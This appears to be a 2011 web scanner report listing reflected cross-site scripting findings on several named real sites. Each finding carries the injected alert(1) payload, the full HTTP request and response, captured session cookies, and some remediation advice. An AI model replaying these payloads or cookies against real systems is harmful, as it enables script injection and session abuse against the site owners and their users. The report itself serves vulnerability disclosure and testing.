HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:08 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: no-cache Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgRprfxgIlvq96duxnob3hvBaWfagsAGz590%7E%7EFQxYvj6_1w_6mEciwlljmE7zfJtLqRlvR8xervxxoGDYYqCbw4kPUBcZEFoZRmrZw8QTqh4Q3urBb47qoF3Tui%7EDMuuA8SW6x111R8MaPvDpqWLDXbH2fjE%7EjAQJy%7EjpssYasVZ6HH79id9iSiVkOhJWhsMfM4PF1Frjy3wyBiwGBVx8ENPxA2o1dJ0ebJPuv5%7EJLSu504MoxpXxUSQUXU%7EseRXqvR9FJr7oB15DwsOl4WjzTn0NPd0rGO3Fas0MnPCVz9jhd8VYKFNvqPkw9jFjGI5RxmfMPs1cmyuG3nobRb1T%7EEeNs7LFMydaVYBQOOEVJ6jaF1Re9n%7EAnssEQJc50mpLkTRawP6ipl92XTouSftSuWnhiHv2QavJLs2kQPIo4CwPpvMympk9qYSFcWtVh1AzWTOSuaIE967DBi4q0x4h7xmtPl28r4A2IvoxYQCn8Q6%7E7%7EmD%7E3OVgp4HNwqM%7EBqbGGyF1_k2hY%21; path=/; httponly RNT-Time: D=104396 t=1296697268034941 RNT-Machine: 06 F5_do_compression: yes Keep-Alive: timeout=15, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 25362
The value of the nsextt request parameter is copied into the HTML document as plain text between tags. The payload 607f7<script>alert(1)</script>42eba27e39e was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000002)%3C/script%3E607f7<script>alert(1)</script>42eba27e39e HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:10 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUAaKWBZ7SvvLxWfp%7EcIQfh7mPnrXi9vTZtK7WkhczqL64yYHQ0QVbkK9RHgawNIjpSCmM0Aeaz122bTrt9oxrYqquIIWDHxoUwafbHRYXpZAj8zBo%7EGLua8qDJQ%7EDYr_BEjDeAjfYtPNjYUGrMUjxkR8PpaOpu3f89vemdlgHGnpoJdFLQxsk675FBV9YqReWb3GFGXX4XBah%7EsnYmD_7SyBdqQzd3Zhql7OBAN1jNOgrekoiQBj_XTw6WLuYQmIdNS_1rGasg88i67O%7E9NukjSidUHv2Jl6I7jQxN%7EqKfSPkOD4ngpoXsEKphUlebl6j_XbSJbRExJ716aGgyN_ZtzCyzQ80dbPwgc7f72dHNu4lA3QTPUPqrVQ5_GsqIpIuQPssVxGn6wl0x3yl1rK6szqG50WB0gAY0_rSruLJlE4Xu%7EmXXJ1_cw%21%21; path=/; httponly RNT-Time: D=108020 t=1296697270345051 RNT-Machine: 03 F5_do_compression: yes Keep-Alive: timeout=15, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27261
The value of the nsextt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 547e6</script><script>alert(1)</script>cf48e18b39c was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance//OTc4NC9zaWQvUm41dkhFbGs=?nsextt=547e6</script><script>alert(1)</script>cf48e18b39c HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: arbor.custhelp.com Connection: Keep-Alive
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 01:41:09 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUwXGkB0Q%7EkeN19jaCuImlCbnetW3JO6vRIsg9G5758NlYVaItvU5XjD2ZiX_NiVtKaJDalprrVLj6qlLlDnCI6%7Ejjft3YUnrhb1XA3YpbzwIDJ2F2nssc9F%7E_hnpNzWrw2Dt6CUNXAlY07awZQXpFjnrQoevYbR6hnrOq3wMaN9CfgNv1vGgvLQihsfZk4%7EXk_O9C4jhvJQaDoSUVbklHFGqWJ8Ap%7EA2lWYLgQn7Dj7wu5qJSZymKIh2kaAalN_A3S_oJHJCb%7EeyuIvKrxyUp17gHHKbPNbbV6LCP%7E_JdHcR19nH3J2LrLihYSYy9OqJzfMyriuylyjc%21; path=/; httponly RNT-Time: D=114429 t=1296697269254262 RNT-Machine: 04 F5_do_compression: yes Keep-Alive: timeout=15, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 27211
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9b76</script><script>alert(1)</script>ea583b6f0d9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/sessiond9b76</script><script>alert(1)</script>ea583b6f0d9/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:43 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUgQICmvl2w6Zo2Xi_Jx0N0VgOcbGCC8QFItCAw06VgCz3Mt4%7EGAGfyU2M%7EjB2xMg5ggHpohXV5l5rqv0jWjfN%7EJ%7E72QklUZuENaYBg1WZ4GK77t_VnZJ9ePgqpdt5qpmFeuVSPOvtFdMPJ16uULvibY1%7EVSLYegwJMunUEB4cMQWgeozPB1RX4bpdRmJfNGNYSMipIi5%7ELSfhHdeViZe0S5UhkGq95Iv1vFhIT1B7QKMrn3gv7A%7EiAr7QuieTdfnGa4tw8OQ1cUu8geqVTV4DvFNfsS4YL%7E4vTYnBb8lxnsVeT%7EC5MhQgL0Boz096TdGlDBIUF18UGjd55MRhW9CHmDXXNObd_wZ%7E; path=/; httponly Content-Length: 25622 RNT-Time: D=131773 t=1296691423739902 RNT-Machine: 07 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c521</script><a>a4238952955 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/utils/account_assistance/session/L3RpbWUvMTI5NjY4OTc4NC9zaWQvUm41dkhFbGs4c521</script><a>a4238952955= HTTP/1.1 Host: arbor.custhelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cp_session=aUFH%7ELzAfYJ2PPuNyUgRWTSeigPsOeQA%7EipOqM8yxBeMAJWCdM5YOfDTaYgoDYs_6WpYX_u_3dCBNajOZHjo1FsN0aUXSg71DJVZxpdQWGa4fpEUdSfpuCHDJwW8hDUul8x2erXqQLgBMSj042zM%7EFVjaOTVz7I8x1;
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 00:03:48 GMT Server: Apache P3P: policyref="https://arbor.custhelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUl5Nj4RPJmKrK0ec4KoYcZ74WET9xduFZF8XJhcIYWFDJvt8YVPg5PiixPRy5Sn%7Ehiidpu8t9H6PgtJWmiJjeDFhqdz2g4M6rZvKVoR3cwoU%7EA3cXzprLyv6lvudmE_MqxYdg0wnBtp0VjGBkouhpp2g8RrZCMvI7C8uRKHyHdrhjYuH3jeP_vuoouEl7b4xlfWmNRvdchpWhQ9wzT4Bz4fIiibRbgmiM; path=/; httponly Content-Length: 25600 RNT-Time: D=113558 t=1296691428704362 RNT-Machine: 03 F5_do_compression: yes Content-Type: text/html; charset=UTF-8 Connection: close
The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f27fe%3balert(1)//63b819cf766 was submitted in the BT_PID parameter. This input was echoed as f27fe;alert(1)//63b819cf766 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777f27fe%3balert(1)//63b819cf766&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:37 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ATV1=43499dU6T3Hc1c4LLc8N2Hccc3065c2DFGcc17OVc8ccc17OVccccc; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC1=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701370249&S2=98501z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ASB1=TX=1296684097&Pb=0&A=8&SID=077E13A179464CC6B65ADCF24D55BF62&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79344&Cr=98501&W=40735&Tr=40735&Cp=4789&P=285777&B=1; expires=Thu, 17-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=2B636B63D42641EFBEA212DDAB2EF869; path=/ Date: Wed, 02 Feb 2011 22:01:37 GMT Connection: close Content-Length: 2725
var bt_ad_content285777f27fe;alert(1)//63b819cf766=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack.com.edgesuite.net/asset ...[SNIP]...
2.17. http://citi.bridgetrack.com/a/s/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://citi.bridgetrack.com
Path:
/a/s/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dc3b"%3balert(1)//132759f788 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9dc3b";alert(1)//132759f788 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/s/?BT_PID=285777&BT_CON=1&BT_PM=1&r=0.13228369411081076&_u=visitor&_d=http://www.citi.com&9dc3b"%3balert(1)//132759f788=1 HTTP/1.1 Host: citi.bridgetrack.com Proxy-Connection: keep-alive Referer: http://www.citi.com/domain/home.htm Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: AdData=S1C=1&S1T=201101282216000635&S1=98231z612428; CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; CitiBT%5F9=
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: application/x-javascript Expires: Tue, 01 Feb 2011 22:01:48 GMT Vary: Accept-Encoding Server: P3P: CP="NON DSP COR DEVa PSAa IVAo CONo OUR IND UNI PUR NAV DEM LOC", policyref="http://citi.bridgetrack.com/w3c/p3p.xml" Set-Cookie: ASB9=TX=1296684109&Pb=0&A=8&SID=DD8583ED0D2F43239CBC136CC3E1C6DE&Vn=0&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=79292&Cr=98462&W=41062&Tr=41062&Cp=4112&P=285777&B=9; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: CitiBT=GUID=AC51251795744B1CB850CA9CB046EBD8; expires=Sat, 28-Jan-2012 05:00:00 GMT; path=/ Set-Cookie: AdData=S2C=1&S1=98231z612428&S1T=201101282216000635&S2T=201102021701480650&S2=98462z285777&S1C=1; expires=Sun, 03-Apr-2011 04:00:00 GMT; path=/ Set-Cookie: ATV9=33820dU6T3Tc1c40Gc8N2Hccc304Uc2DDScc1836c8ccc1836ccccc; expires=Sat, 05-Feb-2011 05:00:00 GMT; path=/ Set-Cookie: VCC9=; expires=Sat, 01-Jan-2000 05:00:00 GMT; path=/ Set-Cookie: CitiBTSES=SID=4E30CB4C3E0A4790B2D6A833F5FD8992; path=/ Date: Wed, 02 Feb 2011 22:01:47 GMT Connection: close Content-Length: 2739
var bt_ad_content285777=true; function BTWrite(s) { document.write(s); } function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf="http://citi.bridgetrack ...[SNIP]... net/assets/98459/CITI_PlatVCR_SpecialOffer_688x153_18m_jan11.jpg";var btbase=btf.substring(0, btf.lastIndexOf("/"))+"/";var lg="http://citi.bridgetrack.com/a/c/?BT_BCID=249747&BT_SID=101521&_u=visitor&9dc3b";alert(1)//132759f788=1&_d=http%3A%2F%2Fwww%2Eciti%2Ecom";var lf="lid=&clickTAG=http%3A%2F%2Fciti%2Ebridgetrack%2Ecom%2Fads%5Fv2%2Fimg%5Fclick%2F%3FBT%5FBCID%3D249747%26BT%5FSID%3D101521%26%5Fu%3Dvisitor%269dc3b%22%3Balert ...[SNIP]...
2.18. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 85e9a'><script>alert(1)</script>5b968c91723 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?85e9a'><script>alert(1)</script>5b968c91723=1&_rcid=11510#fastreply' title="Reply directly to this post" id='reply_comment_11510' class='reply_comment'> ...[SNIP]...
2.19. http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63b66"-alert(1)-"9daffae2531 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/?63b66"-alert(1)-"9daffae2531=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cfadb'><script>alert(1)</script>b8e6b27f29e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommentcfadb'><script>alert(1)</script>b8e6b27f29e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8785"-alert(1)-"f79d44465d6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5785-ipnexus-12-dev-update-cpanel-integration/page__show__newcommenta8785"-alert(1)-"f79d44465d6"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: cPanel Integration"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.22. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a214f'><script>alert(1)</script>6b477eb9bf9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <a href='http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?a214f'><script>alert(1)</script>6b477eb9bf9=1&_rcid=11570#fastreply' title="Reply directly to this post" id='reply_comment_11570' class='reply_comment'> ...[SNIP]...
2.23. http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7c05"-alert(1)-"4172e4c7f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/?b7c05"-alert(1)-"4172e4c7f92=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63ba7'><script>alert(1)</script>63af09f8016 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment63ba7'><script>alert(1)</script>63af09f8016 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e4ce"-alert(1)-"bbb3000212e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... ipt type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5791-ipboard-320-dev-update-calendar-improvements-part-i-seo-improvements/page__show__newcomment8e4ce"-alert(1)-"bbb3000212e"; ipb.sharelinks.title = "IP.Board 3.2.0 Dev Update: Calendar Improvements, Part I: SEO Improvements"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.26. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9eb7"-alert(1)-"47bb8743371 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1 HTTP/1.1 Host: community.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f ...[SNIP]... <script type="text/javascript"> ipb.sharelinks.url = "http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/?b9eb7"-alert(1)-"47bb8743371=1"; ipb.sharelinks.title = "IP.Nexus 1.2 Dev Update: Payment Improvements & Anti-Fraud Protection"; ipb.sharelinks.bname = "Invision Power Services"; </script> ...[SNIP]...
2.27. http://community.invisionpower.com/blog/1174/entry-5797-ipnexus-12-dev-update-payment-improvements-anti-fraud-protection/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25d4c'><script>alert(1)</script>76947efd1fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
